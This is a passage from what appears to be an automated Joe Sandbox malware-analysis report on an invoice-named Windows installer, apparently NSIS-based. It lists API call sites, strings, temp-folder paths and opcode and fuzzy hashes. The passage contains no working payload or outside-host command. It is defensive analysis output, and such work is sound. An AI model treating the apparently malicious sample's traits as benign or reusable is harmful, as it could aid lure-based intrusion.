                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                • String ID: 9
                                                                                                • API String ID: 163830602-2366072709
                                                                                                • Opcode ID: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                                                • Instruction ID: 56da5788d6d90062f79809d4a3c22d6e203981add65e083e01e3e907f30c056e
                                                                                                • Opcode Fuzzy Hash: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                                                • Instruction Fuzzy Hash: 3F512774D0021AAADF209F94CA88AAEB779FF04344F50447BE501F72E0D7B99D429B69
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                                                • lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                                                • lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
                                                                                                • SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2531174081-0
                                                                                                • Opcode ID: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                                                • Instruction ID: 21bddbe199db3e121897d5596c22f00b0e76f5ccd37bc28327e30b1938552548
                                                                                                • Opcode Fuzzy Hash: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                                                • Instruction Fuzzy Hash: 9E219D71900118BACB219FA5DD84ACFBFB9EF58350F14807AF904B62A0C7798A41CF68
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A63
                                                                                                • GetMessagePos.USER32 ref: 00404A6B
                                                                                                • ScreenToClient.USER32(?,?), ref: 00404A85
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A97
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ABD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                                                • Instruction ID: 42cc3fd90da340ed33e1658783c39be2c5e0210da91f3d0a8fd677c6224e58ad
                                                                                                • Opcode Fuzzy Hash: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                                                • Instruction Fuzzy Hash: 19015E71E40218BADB00DB94DD85FFEBBBCAF54711F10016BBB11B61D0D7B8AA058BA5
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                • MulDiv.KERNEL32 ref: 00402D4D
                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                                                • Instruction ID: 02b4a25e1ca2abb3aa07e0940f0a1006ed88c36cf357b8fab3844828eab6b7e4
                                                                                                • Opcode Fuzzy Hash: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                                                • Instruction Fuzzy Hash: 3E01F471640209ABEF249F61DD49FEA3B69EB04305F008035FA05A92D1DBB999548F59
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401D66
                                                                                                • MulDiv.KERNEL32 ref: 00401D75
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                • CreateFontIndirectW.GDI32(0040BDD0), ref: 00401DD1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                • String ID: Tahoma
                                                                                                • API String ID: 3808545654-3580928618
                                                                                                • Opcode ID: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
                                                                                                • Instruction ID: f0de02ddeea559f0acc09b7c654b6cc4e6647674a776793065cdf7257ef1e696
                                                                                                • Opcode Fuzzy Hash: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
                                                                                                • Instruction Fuzzy Hash: FF01A231948244BFE701ABB0AE5EBDA7F74EB65305F004479F551B62E2C77810008B6E
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2667972263-0
                                                                                                • Opcode ID: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                                                • Instruction ID: ec7c0e824f3835a9a78c8c015c1ffbc75d15747d838d6b82ce361eed526a9b83
                                                                                                • Opcode Fuzzy Hash: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                                                • Instruction Fuzzy Hash: 1B219E72C00118BBCF216FA5CD49D9E7E79EF09324F24027AF520762E1C7796D419BA9
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,brandenes\opinionsdanner\Dagsudflugt,000000FF,open C:\Users\user\Desktop\bhabar\biffins.Unr,00000400,?,?,00000021), ref: 00402583
                                                                                                • lstrlenA.KERNEL32(open C:\Users\user\Desktop\bhabar\biffins.Unr,?,?,brandenes\opinionsdanner\Dagsudflugt,000000FF,open C:\Users\user\Desktop\bhabar\biffins.Unr,00000400,?,?,00000021), ref: 0040258E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                • String ID: brandenes\opinionsdanner\Dagsudflugt$open C:\Users\user\Desktop\bhabar\biffins.Unr
                                                                                                • API String ID: 3109718747-4001181529
                                                                                                • Opcode ID: 41a6a179fb68a1dd8f2227d4bb464c028c2f78b5ef8fee0b912b5d320b399072
                                                                                                • Instruction ID: bfa6d714be92c4527cef4f8895cb5ef110114927b7979418da5827123998f54c
                                                                                                • Opcode Fuzzy Hash: 41a6a179fb68a1dd8f2227d4bb464c028c2f78b5ef8fee0b912b5d320b399072
                                                                                                • Instruction Fuzzy Hash: AE110A72A41204BEDB10AFB58F4AE9E3669AF54394F20403BF402F61C2D6FC8E41466D
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
                                                                                                • GetLastError.KERNEL32 ref: 004056A4
                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B9
                                                                                                • GetLastError.KERNEL32 ref: 004056C3
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405673
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 3449924974-4017390910
                                                                                                • Opcode ID: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
                                                                                                • Instruction ID: d2f3f002a39499475f228c0a6bab6309b881bedc09a5d6a8f103fb05119b383a
                                                                                                • Opcode Fuzzy Hash: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
                                                                                                • Instruction Fuzzy Hash: DE010871D14219EAEF119FA0CD047EFBFB8EB14314F10853AD909B6190E779A604CFAA
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                • LoadImageW.USER32 ref: 00401D2E
                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 46a566bd88e14f988bb6b4d3647cfc8d42b3f26eb96179daab85898a76a231e8
                                                                                                • Instruction ID: fda10597d29eaa6b078217e10feb255e8dba845150ef54d65940bec6a2f4d034
                                                                                                • Opcode Fuzzy Hash: 46a566bd88e14f988bb6b4d3647cfc8d42b3f26eb96179daab85898a76a231e8
                                                                                                • Instruction Fuzzy Hash: 3AF0C972A04104AFDB11DBA4EE88CEEBBBDEB48311B104566F602F61A1C675ED418B39
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
                                                                                                • wsprintfW.USER32 ref: 004049E4
                                                                                                • SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
                                                                                                • Instruction ID: f455ebafcbecf6c6930287b8ee8bcbe2db44ea01d8d71c40407b913fda14730a
                                                                                                • Opcode Fuzzy Hash: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
                                                                                                • Instruction Fuzzy Hash: D611D87364412867DB10A6BD9C45EAF3288DB85374F250237FA26F61D2DA798C6182D8
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059D9
                                                                                                • CharPrevW.USER32(?,00000000), ref: 004059E3
                                                                                                • lstrcatW.KERNEL32(?,00409014), ref: 004059F5
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-4017390910
                                                                                                • Opcode ID: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
                                                                                                • Instruction ID: e27ca5b6c843e4ca6b7b7419ee0e736cc2f4fee1b15a20ddc9c218eb8b1253ea
                                                                                                • Opcode Fuzzy Hash: d7e49c6a6175e7957920a8ebfa112e8ed7db4acdde4d4b40ed7b02ca79cf1c4c
                                                                                                • Instruction Fuzzy Hash: 1DD0A761101930AAC212E7488C00DDF729CAE55345341003BF107B30B1C7781D5287FE
                                                                                                APIs
                                                                                                • DestroyWindow.USER32 ref: 00402D9D
                                                                                                • GetTickCount.KERNEL32(00000000,00402F6A,00000001,?,?,00000000,00403504,?), ref: 00402DBB
                                                                                                • CreateDialogParamW.USER32 ref: 00402DD8
                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402DE6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
                                                                                                • Instruction ID: e23ac89653febb243e72dcf23735aaa2031a226b5032255065ec6e4c9dbb6a99
                                                                                                • Opcode Fuzzy Hash: 5b077e3499f9c07bbd95dc59ca3d471d91709291d8f5bd327ee9b7f2041f6974
                                                                                                • Instruction Fuzzy Hash: B3F0F431909220EBC6516B54FD4C9DB7F75FB4571270149B7F001B11E4D7B95C818BAD
                                                                                                APIs
                                                                                                  • Part of subcall function 0040601F: lstrcpynW.KERNEL32(00409300,00409300,00000400,0040331A,00428220,NSIS Error), ref: 0040602C
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(?), ref: 00405A8C
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405A91
                                                                                                  • Part of subcall function 00405A7E: CharNextW.USER32(00000000), ref: 00405AA9
                                                                                                • lstrlenW.KERNEL32(00424F10,00000000,00424F10,00424F10,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405830,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REVISED INVOICE.exe"), ref: 00405B34
                                                                                                • GetFileAttributesW.KERNEL32(00424F10,00424F10,00424F10,00424F10,00424F10,00424F10,00000000,00424F10,00424F10,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405830,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405B44
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405ADB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 3248276644-4017390910
                                                                                                • Opcode ID: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
                                                                                                • Instruction ID: a8deb24d6afa2735206f329f0351f59021ff10951cf48c606255c952c9ad3203
                                                                                                • Opcode Fuzzy Hash: 5cd88eb9c331bd035ef3732d22fdb38d6df270911e15b1e56a74679c362f2206
                                                                                                • Instruction Fuzzy Hash: CBF04921304E5215D622323A1C44AAF3554CFC1364705073BB861721E1CB3C9943DE7E
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?,7570D4C4,00000000,C:\Users\user\AppData\Local\Temp\,004037AB,004035C0,?), ref: 004037ED
                                                                                                • GlobalFree.KERNEL32(?), ref: 004037F4
                                                                                                Strings
